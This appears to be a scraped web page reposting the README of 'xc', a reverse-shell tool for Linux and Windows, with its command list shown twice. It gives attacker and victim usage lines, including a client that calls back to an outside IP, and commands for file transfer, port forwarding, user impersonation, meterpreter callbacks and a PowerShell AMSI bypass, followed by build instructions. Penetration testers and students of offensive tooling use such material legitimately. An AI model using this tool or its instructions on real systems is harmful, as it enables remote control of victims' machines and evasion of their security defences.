• caglararli@hotmail.com
  • 05386281520

XC – A Small Reverse Shell For Linux And Windows

XC – A Small Reverse Shell For Linux And Windows

Netcat like reverse shell for Linux & Windows.



└ Shared Commands: !exit
!upload <src> <dst>
* uploads a file to the target
!download <src> <dst>
* downloads a file from the target
!lfwd <localport> <remoteaddr> <remoteport>
* local portforwarding (like ssh -L)
!rfwd <remoteport> <localaddr> <localport>
* remote portforwarding (like ssh -R)
* lists active forwards
!rmfwd <index>
* removes forward by index
* lists available plugins
!plugin <plugin>
* execute a plugin
!spawn <port>
* spawns another client on the specified port
* runs /bin/sh
!runas <username> <password> <domain>
* restart xc with the specified user
!met <port>
* connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
!powe rshell
* starts powershell with AMSI Bypass
!rc <port>
* connects to a local bind shell and restarts this client over it
!runasps <username> <password> <domain>
* restart xc with the specified user using powershell
* checks for common vulnerabilities


└ Shared Commands: !exit
!upload <src> <dst>
* uploads a file to the target
!download <src> <dst>
* downloads a file from the target
!lfwd <localport> <remoteaddr> <remoteport>
* local portforwarding (like ssh -L)
!rfwd <remoteport> <localaddr> <localport>
* remote portforwarding (like ssh -R)
* lists active forwards
!rmfwd <index>
* removes forward by index
* lists available plugins
!plugin <plugin>
* execute a plugin
!spawn <port>
* spawns another client on the specified port
* runs /bin/sh
!runas <username> <password> <domain>
* restart xc with the specified user
!met <port>
* connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
!ssh < port>
* starts sshd with the configured keys on the specified port


  • Linux Attacker: rlwrap xc -l -p 1337 (Server)
  • WindowsVictim : xc.exe 1337 (Client)
  • Argumentless: xc_10.10.14.4_1337.exe (Client)


Make sure you are running golang version 1.15+, older versions will not compile. I tested it on ubuntu: go version go1.16.2 linux/amd64 and kali go version go1.15.9 linux/amd64

git clone --recurse-submodules https://github.com/xct/xc.git

GO111MODULE=off go get golang.org/x/sys/...
GO111MODULE=off go get golang.org/x/text/encoding/unicode
GO111MODULE=off go get github.com/hashicorp/yamux
sudo apt-get install rlwrap upx


python3 build.py

Known Issues

  • When !lfwd fails due to lack of permissions (missing sudo), the entry in !lsfwd is still created
  • Can't Ctrl+C out of powershell started from !shell
  • !net (execute-assembly) fails after using it a few times - for now you can !restart and it might work again
  • Tested:
    • Kali (Attacker) Win 10 (Victim)
